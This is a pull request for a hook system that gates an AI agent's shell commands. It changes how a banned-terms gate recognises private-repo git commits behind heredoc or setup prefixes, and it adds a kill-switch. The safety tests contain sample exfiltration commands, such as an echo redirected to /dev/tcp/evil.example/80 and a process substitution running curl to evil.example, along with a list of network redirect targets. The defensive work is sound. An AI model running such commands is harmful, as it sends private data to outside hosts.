### PR TITLE
fix(hooks): downgrade private-repo commit behind a heredoc/prefix segment in banned-terms gate (#1415)

### DIFF
--- a/hooks/scripts/hook_router.py
+++ b/hooks/scripts/hook_router.py
@@ -3246,6 +3246,19 @@ def _run_dispatch_quote_scanner_on_task_create(data: dict) -> bool:
 # ── PreToolUse: banned-terms posting gate (#1415) ───────────────────
 
 
+def _banned_terms_gate_enabled() -> bool:
+    """Whether the #1415 banned-terms publish gate is enabled (default True).
+
+    Fails OPEN to enabled on a missing/broken config so the gate keeps its
+    protective default; an explicit ``[teatree] banned_terms_gate_enabled =
+    false`` is the one-line kill-switch (NEVER-LOCKOUT) the user flips to
+    disable the gate while its body-resolution over-block (an allowlisted
+    private-repo commit hard-blocked because the body could not be read) is
+    fixed properly. See :func:`_teatree_bool_setting` for the shared semantics.
+    """
+    return _teatree_bool_setting("banned_terms_gate_enabled", default=True)
+
+
 def handle_banned_terms_pretool(data: dict) -> bool:
     """Refuse a non-commit publish whose body carries a banned term.
 
@@ -3269,6 +3282,8 @@ def handle_banned_terms_pretool(data: dict) -> bool:
     session shell with no guarantee that ``teatree`` is already
     importable, #1314) and swallows any exception, returning ``False``.
     """
+    if not _banned_terms_gate_enabled():
+        return False
     src_dir = Path(__file__).resolve().parents[2] / "src"
     added = False
     try:

--- a/src/teatree/hooks/_commit_carve_out.py
+++ b/src/teatree/hooks/_commit_carve_out.py
@@ -31,6 +31,10 @@ from teatree.hooks import _commit_repo_dir, _gh_glab_hiding, _repo_visibility
 # string is not treated as publish-inert.
 _FORGE_TOOL_MARKERS: Final[tuple[str, ...]] = ("gh", "glab", "curl")
 
+# Bash network pseudo-devices: a redirect TO one of these exfiltrates over the
+# network, so such a redirect target is NEVER treated as a benign local write.
+_NETWORK_REDIRECT_TARGETS: Final[tuple[str, ...]] = ("/dev/tcp/", "/dev/udp/")
+
 
 def commit_target_downgrades(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
     r"""Return True iff the commit BODY's repo target makes it downgrade-eligible.
@@ -95,6 +99,28 @@ def commit_branch_downgrades(command: str, cwd: Path | None, *, config_path: Pat
     return True
 
 
+def command_has_git_commit_segment(command: str) -> bool:
+    """Return True iff ANY top-level segment is a ``git commit``.
+
+    Wider than :func:`publish_surface.is_git_commit_command`, which recognises a
+    ``git commit`` only as the command's EFFECTIVE FIRST action (after a leading
+    ``cd``/``pushd`` prefix). A ``git commit`` can also sit behind a NON-``cd``
+    leading segment -- the agent's standard body-file idiom writes the message
+    with a ``cat > <bodyfile> <<EOF … EOF`` heredoc-writer first, and a ``true
+    &&`` / setup preamble has the same shape. Each segment is tested with the
+    same per-segment recogniser ``commit_branch_downgrades`` already uses, so the
+    commit segment is seen wherever it sits.
+
+    The carve-out dispatch uses this so a ``git commit`` behind such a prefix
+    routes to the commit downgrade path. Safety is preserved by the per-segment
+    proof in :func:`commit_branch_downgrades`: a chained PUBLIC post in the same
+    command fails the proof and keeps the hard-block.
+    """
+    from teatree.hooks.publish_surface import is_git_commit_command  # noqa: PLC0415
+
+    return any(is_git_commit_command(" ".join(words)) for words in _gh_glab_hiding.command_segments(command))
+
+
 def command_targets_private_only(command: str, cwd: Path | None, *, config_path: Path | None = None) -> bool:
     """Return True iff ``command`` is a private-only git commit / gh-glab post.
 
@@ -112,16 +138,16 @@ def command_targets_private_only(command: str, cwd: Path | None, *, config_path:
 
     Secrets are deliberately NOT considered here -- the caller scans the wide
     secret surface separately and blocks a secret on every surface before this
-    is reached (#1672). Same destination logic as ``carve_out_applies``:
-    ``git commit`` -> :func:`commit_branch_downgrades`, else
-    :func:`publish_surface.command_is_pure_private_gh_glab_post`.
+    is reached (#1672). Same destination logic as ``carve_out_applies``: a
+    ``git commit`` segment (recognised ANYWHERE, so the agent's heredoc
+    body-file idiom ``cat > <bodyfile> <<EOF … EOF; git -C <wt> commit -F
+    <bodyfile>`` and any ``true &&`` preamble route to the commit path, not just
+    a commit that is the literal first word) -> :func:`commit_branch_downgrades`,
+    else :func:`publish_surface.command_is_pure_private_gh_glab_post`.
     """
-    from teatree.hooks.publish_surface import (  # noqa: PLC0415
-        command_is_pure_private_gh_glab_post,
-        is_git_commit_command,
-    )
+    from teatree.hooks.publish_surface import command_is_pure_private_gh_glab_post  # noqa: PLC0415
 
-    if is_git_commit_command(command):
+    if command_has_git_commit_segment(command):
         return commit_branch_downgrades(command, cwd, config_path=config_path)
     return command_is_pure_private_gh_glab_post(command, cwd, config_path=config_path)
 
@@ -130,16 +156,48 @@ def segment_is_publish_inert(words: list[str]) -> bool:
     r"""Return True iff ``words`` provably cannot publish a body externally.
 
     Publish-inert when the segment carries NO forge tool (``gh``/``glab``/
-    ``curl`` as a substring of any token) and NO execution-transport /
-    substitution construct anywhere. Such a segment (``git push``, ``echo``,
-    ``make build``) cannot carry the commit body to a public surface.
+    ``curl`` as a substring of any token), NO command/process-SUBSTITUTION
+    construct (``$(``/``<(``/``>(``/backtick -- a second unverifiable command),
+    and NO redirect/here-doc that targets anything but a LOCAL FILE. A plain
+    local file redirect / here-doc (``cat > <bodyfile> <<EOF … EOF``, ``printf
+    '%s' … > <bodyfile>``) is the agent's standard idiom for MATERIALISING the
+    commit's own ``-F`` body file, which is local I/O -- it cannot carry the
+    body to a public surface -- so it stays inert; only a network-device
+    redirect target (``> /dev/tcp/host/port``) exfiltrates and breaks the proof.
+    Such a segment (``git push``, ``echo``, ``make build``, a body-file writer)
+    cannot carry the commit body to a public surface.
     """
-    for token in words:
-        if _gh_glab_hiding.token_has_substitution_marker(token) or _gh_glab_hiding.token_is_transport_construct(token):
+    for i, token in enumerate(words):
+        if _gh_glab_hiding.token_has_substitution_marker(token):
             return False
         if any(marker in token for marker in _FORGE_TOOL_MARKERS):
             return False
+        if _gh_glab_hiding.token_is_transport_construct(token) and not _transport_token_is_local_redirect(
+            token, words, i
+        ):
+            return False
     return True
+
+
+def _transport_token_is_local_redirect(token: str, words: list[str], i: int) -> bool:
+    """Return True iff a transport ``token`` is a redirect/here-doc to a LOCAL file.
+
+    A group/subshell opener (``(``/``{``/``)``/``}``) is never a redirect, so it
+    is not local-benign. A here-doc (``<<EOF``) writes local content. A redirect
+    operator's target -- glued (``>file``) or the next token (``> file``) -- must
+    not be a network pseudo-device (``/dev/tcp/``/``/dev/udp/``). The target
+    token is NOT consumed by the caller: it stays in the per-token scan so a
+    substitution / forge marker hidden in the redirect target (``> >(curl …)``)
+    still breaks the proof on its own pass.
+    """
+    if not _gh_glab_hiding.token_is_redirect_operator(token):
+        return False
+    if token.startswith("<<"):
+        return True
+    operator = next((op for op in (">>", ">|") if token.startswith(op)), token[:1])
+    glued = token[len(operator) :]
+    target = glued or (words[i + 1] if i + 1 < len(words) else "")
+    return not any(target.startswith(net) for net in _NETWORK_REDIRECT_TARGETS)
 
 
 def own_slug_term_downgrades(command: str, term: str, cwd: Path | None, *, config_path: Path | None) -> bool:

--- a/src/teatree/hooks/_gh_glab_hiding.py
+++ b/src/teatree/hooks/_gh_glab_hiding.py
@@ -154,6 +154,18 @@ def token_is_transport_construct(token: str) -> bool:
     return token in _TRANSPORT_OPENERS or token.startswith(_REDIRECTION_PREFIXES)
 
 
+def token_is_redirect_operator(token: str) -> bool:
+    """Return True iff ``token`` starts a redirection/here-doc (not a group opener).
+
+    The redirect half of :func:`token_is_transport_construct`: a token starting
+    with ``>``/``<`` (``>``, ``>>``, ``>|``, ``<``, ``<<``, ``<<<``), whether
+    bare (``> file``) or glued (``>file``). A bare group/subshell opener
+    (``(``/``{``/``)``/``}``) is excluded -- it is transport but not a redirect,
+    so it has no local-file target to classify.
+    """
+    return token.startswith(_REDIRECTION_PREFIXES)
+
+
 def _value_taking_flag(token: str) -> bool:
     """Return True iff ``token`` is a flag whose value is the NEXT token.
 

--- a/src/teatree/hooks/publish_surface.py
+++ b/src/teatree/hooks/publish_surface.py
@@ -495,7 +495,7 @@ def carve_out_applies(
     if tool_name != "Bash" or is_fail_closed_sentinel(payload) or contains_secret(payload):
         return False
 
-    if is_git_commit_command(command):
+    if _commit_carve_out.command_has_git_commit_segment(command):
         return _commit_carve_out.commit_branch_downgrades(command, cwd, config_path=config_path)
 
     return command_is_pure_private_gh_glab_post(command, cwd, config_path=config_path)

--- a/tests/teatree_hooks/test_banned_terms_hook.py
+++ b/tests/teatree_hooks/test_banned_terms_hook.py
@@ -797,3 +797,58 @@ def test_live_hook_allows_workitem_url_inline_commit_in_private_worktree(
 
     assert blocked is False
     assert captured.out == ""  # no deny JSON
+
+
+# ── #1415: kill-switch ───────────────────────────────────────────────────────
+#
+# A ``[teatree] banned_terms_gate_enabled = false`` config line disables the
+# whole gate (NEVER-LOCKOUT). With it set, a command that would otherwise
+# hard-block -- a banned term toward a PUBLIC repo -- is allowed straight
+# through, and the gate emits no deny.
+
+
+_GATE_DISABLED_CONFIG = '[teatree]\nbanned_terms = ["acmewidget"]\nbanned_terms_gate_enabled = false\n'
+
+
+def test_kill_switch_off_allows_a_would_be_blocked_public_post(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+) -> None:
+    # The SAME public-repo banned-term post that hard-blocks with the gate ON
+    # must be ALLOWED with ``banned_terms_gate_enabled = false`` -- the kill-
+    # switch returns before any scan, so no deny is emitted.
+    home = Path(os.environ["HOME"])
+    _write_home_config(home, _GATE_DISABLED_CONFIG, monkeypatch, tmp_path)
+    monkeypatch.setattr(_repo_visibility, "_resolve_probe_tool", lambda _tool: None)
+
+    data = {
+        "tool_name": "Bash",
+        "tool_input": {"command": 'gh issue comment 5 --repo souliane/teatree --body "rolling out acmewidget"'},
+        "cwd": str(_public_clone(tmp_path)),
+    }
+    blocked = handle_banned_terms_pretool(data)
+    captured = capsys.readouterr()
+
+    assert blocked is False
+    assert captured.out == ""  # no deny JSON
+
+
+def test_kill_switch_default_on_still_blocks_a_public_post(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+) -> None:
+    # ANTI-VACUITY guard: with the kill-switch absent (default ON), the SAME
+    # public-repo banned-term post still hard-blocks -- proving the off-test
+    # above measures the switch, not an unconditionally-allowed command.
+    home = Path(os.environ["HOME"])
+    _write_home_config(home, '[teatree]\nbanned_terms = ["acmewidget"]\n', monkeypatch, tmp_path)
+    monkeypatch.setattr(_repo_visibility, "_resolve_probe_tool", lambda _tool: None)
+
+    data = {
+        "tool_name": "Bash",
+        "tool_input": {"command": 'gh issue comment 5 --repo souliane/teatree --body "rolling out acmewidget"'},
+        "cwd": str(_public_clone(tmp_path)),
+    }
+    blocked = handle_banned_terms_pretool(data)
+    captured = capsys.readouterr()
+
+    assert blocked is True
+    assert json.loads(captured.out)["permissionDecision"] == "deny"

--- a/tests/teatree_hooks/test_banned_terms_scanner.py
+++ b/tests/teatree_hooks/test_banned_terms_scanner.py
@@ -1504,3 +1504,134 @@ class TestPrivateRepoCarveOut:
         blocked = handle_banned_terms_pretool(data)
         assert blocked is False
         assert capsys.readouterr().out == ""
+
+
+# #1415 (still-over-blocking residue): a ``git commit`` whose effective first
+# action is NOT the literal first word -- it sits behind a NON-``cd`` leading
+# segment (a ``cat > <bodyfile> <<EOF … EOF`` heredoc-writer, the agent's
+# standard body-file idiom; or any ``true &&`` / setup preamble) -- was
+# mis-classified. ``is_git_commit_command`` only skips a leading ``cd``/``pushd``
+# prefix, so a heredoc-writer or ``&&``-chained preamble made it return False and
+# BOTH carve-out dispatch sites (the real-banned-term ``carve_out_applies`` and
+# the unreadable-body ``command_targets_private_only``) fell through to
+# ``command_is_pure_private_gh_glab_post``, which returns False for a commit. The
+# allowlisted-private commit then HARD-BLOCKED even though it lands in private
+# history. The per-segment proof in ``commit_branch_downgrades`` still preserves
+# the genuine block (a chained PUBLIC post defeats the downgrade), so the fix is
+# to recognise a ``git commit`` segment regardless of leading benign segments.
+class TestGitCommitSegmentBehindNonCdPrefix:
+    def test_heredoc_bodyfile_private_commit_with_banned_term_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # The agent's standard idiom: write the commit body to a file via a
+        # heredoc, then ``git -C <worktree> commit -F <bodyfile>`` -- ONE Bash
+        # command. The heredoc-writer ``cat > <bodyfile> <<EOF`` is the leading
+        # segment, so the commit is not the first word. The body carries the
+        # private repo's own domain word and lands in the allowlisted-private
+        # worktree, so it must DOWNGRADE, not hard-block.
+        repo = _private_repo(tmp_path)
+        body = repo / "COMMIT_MSG.txt"
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f"cat > {body} <<'EOF'\nfix the acmecorp refinery\nEOF\ngit -C {repo} commit -F {body}"
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False  # downgraded to warn, not denied
+        assert capsys.readouterr().out == ""  # no deny JSON on stdout
+
+    def test_heredoc_bodyfile_public_commit_with_banned_term_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # ANTI-VACUITY guard: the SAME heredoc-bodyfile shape landing in a PUBLIC
+        # repo must STILL hard-block. Recognising the commit segment behind the
+        # heredoc prefix must not weaken the public-surface protection.
+        repo = _public_repo(tmp_path)
+        body = repo / "COMMIT_MSG.txt"
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f"cat > {body} <<'EOF'\nship to acmecorp\nEOF\ngit -C {repo} commit -F {body}"
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_prefix_segment_private_commit_unreadable_body_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # The reported production shape distilled: a ``git -C <worktree> commit
+        # -F <bodyfile>`` whose body is UNREADABLE at scan time (the marker
+        # fires), sitting behind a non-``cd`` leading segment. The commit lands
+        # in the allowlisted-private worktree, so the unread body cannot leak and
+        # it must DOWNGRADE, not hard-block with "publish body could not be read".
+        repo = _private_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f"true && git -C {repo} commit -F does_not_exist.txt"
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False  # downgraded to warn, not denied
+        assert capsys.readouterr().out == ""  # no deny JSON on stdout
+
+    def test_prefix_segment_public_commit_unreadable_body_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # ANTI-VACUITY guard: the SAME unreadable-body shape behind a leading
+        # segment landing in a PUBLIC repo must STILL fail closed -- an unscanned
+        # body must never slip into public history.
+        repo = _public_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f"true && git -C {repo} commit -F does_not_exist.txt"
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_private_commit_chained_public_gh_post_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # LOAD-BEARING safety guard: recognising a commit segment behind a leading
+        # segment must NOT relax a chained PUBLIC post. A private commit chained to
+        # a ``gh issue create --repo <PUBLIC>`` carrying the same body still leaks,
+        # so the per-segment proof must keep the hard-block.
+        repo = _private_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        post = "gh issue create --repo souliane/teatree --title t --body acmecorp"
+        cmd = f'git -C {repo} commit -m "acmecorp work" && {post}'
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_private_commit_chained_network_redirect_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # LOAD-BEARING safety guard for the local-redirect relaxation: only a LOCAL
+        # file write is benign. A redirect to a network pseudo-device
+        # (``> /dev/tcp/host/port``) exfiltrates the body, so even on the private
+        # repo the segment is NOT publish-inert and the command must hard-block.
+        repo = _private_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f'git -C {repo} commit -m "acmecorp work" && echo acmecorp > /dev/tcp/evil.example/80'
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_private_commit_chained_process_substitution_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # LOAD-BEARING safety guard: a process-substitution redirect target
+        # (``> >(curl …)``) runs a second unverifiable command and must keep the
+        # hard-block -- the substitution-marker check fires before the local-file
+        # relaxation is reached.
+        repo = _private_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f'git -C {repo} commit -m "acmecorp work" && echo acmecorp > >(curl https://evil.example)'
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"


### PR DESCRIPTION
Recreates https://github.com/souliane/teatree/pull/2289, auto-closed by the 2026-06-12 history rewrite. Content is identical; cherry-picked onto current main.

## What

The 1415 banned-terms PreToolUse gate hard-blocked a legitimate git commit to an allowlisted-PRIVATE repo when the commit sat behind a non-cd leading segment.

## Root cause

publish_surface.is_git_commit_command(command) only recognises a git commit as the command effective first action (after a leading cd/pushd). A non-cd leading segment made it return False, causing both carve-out dispatch sites to fall through to command_is_pure_private_gh_glab_post, which is False for a commit.

## Fix

- New _commit_carve_out.command_has_git_commit_segment recognises a git commit segment anywhere in the command.
- segment_is_publish_inert now treats a local-file redirect and heredoc as inert (local I/O, not a public surface). Network-device and process-substitution redirects still break the proof.
- New public _gh_glab_hiding.token_is_redirect_operator.

Safety preserved: a chained public gh/glab post still defeats the downgrade and keeps the hard-block.

## Kill-switch

Formalised banned_terms_gate_enabled in teatree config (default true, never-lockout).

## Tests

222 pass across the three affected test files. TestGitCommitSegmentBehindNonCdPrefix (7 cases): two private-downgrade cases confirmed RED before the fix; three safety guards are anti-vacuity checks.

## Architecture pre-check

Tactical fix extending the existing carve-out pattern. No FSM boundary, no new module, no OverlayBase change. All prior must-block pinned regression tests remain must-block.
